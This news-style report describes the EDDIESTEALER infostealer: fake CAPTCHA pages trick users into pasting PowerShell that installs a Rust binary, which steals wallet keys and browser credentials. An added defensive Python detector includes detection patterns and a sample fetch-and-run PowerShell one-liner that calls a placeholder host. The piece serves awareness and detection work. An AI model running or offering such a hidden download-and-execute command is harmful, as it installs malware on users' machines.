Cybersecurity firm Elastic Security Labs has uncovered EDDIESTEALER, a new Rust-based type of “infostealer” malware that is specifically designed to gain access to personal data like passwords, browser information, and computer passwords. 

In order to lure in their victims, hackers fake “I’m not a robot” CAPTCHA pop-ups on malicious websites.      

The bogus page instructs you to paste a PowerShell command, which secretly runs a malicious PowerShell script that downloads a second script, which eventually saves the EDDIESTEALER Rust binary.
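A defender-side view of the step above, as an added example that is not taken from Elastic's report: a Python triage over process-creation events that flags PowerShell whose command line combines a hidden window, a download and in-memory execution. The event field names, the assumption that the pasted command is started from the Run dialog (parent `explorer.exe`), and the sample events are all constructed for illustration.

```python
import re

# Heuristics for the chain described above: a pasted one-liner that hides its
# window, downloads a script and runs it in memory.
INDICATORS = {
    "hidden_window": re.compile(r"(?<![\w-])-w[a-z]*\s+hidden\b", re.I),
    "download": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
        r"downloadstring|downloadfile|start-bitstransfer)\b", re.I),
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}
SHELLS = {"powershell.exe", "pwsh.exe"}


def indicators(cmdline):
    """Return the names of the heuristics that match one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def triage(events, threshold=2):
    """Flag PowerShell started by explorer.exe that matches >= threshold heuristics."""
    flagged = []
    for ev in events:
        if ev["image"].lower() not in SHELLS:
            continue
        # Assumption: the pasted command is started from the Run dialog,
        # so its parent process is explorer.exe.
        if ev["parent"].lower() != "explorer.exe":
            continue
        hits = indicators(ev["cmdline"])
        if len(hits) >= threshold:
            flagged.append((ev["cmdline"], hits))
    return flagged


# Constructed process-creation events (not taken from the Elastic report).
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://cdn.example.invalid/verify.ps1 | iex"'},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell.exe"},
    {"parent": "Code.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -File build.ps1"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -c "Invoke-WebRequest https://example.invalid/r.csv -OutFile r.csv"'},
]

if __name__ == "__main__":
    for cmdline, hits in triage(SAMPLE_EVENTS):
        print("ALERT", hits, cmdline)
```

Only the first sample event is flagged; the last one matches a single heuristic (a plain download to a file) and stays below the threshold.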

The malware then decrypts its hidden core, secretly loads Windows functions, and contacts the hackers’ servers, which present a list of tasks.

The malware can scan your computer for files related to crypto (wallet config files, JSON keystores, and so on).

It could potentially extract private keys, seed phrases, wallet passwords, and so on. In such a way, it would be possible for an attacker to easily drain your wallet. 

Chromium-based browsers encrypt sensitive user data such as passwords or session tokens, but the malware is capable of bypassing this encryption with the help of the ChromeKatz tool. The tool can access the browser’s memory and extract sensitive data. 

After stealing the data of its unfortunate victims, the malware ends up deleting itself in order to cover its tracks.
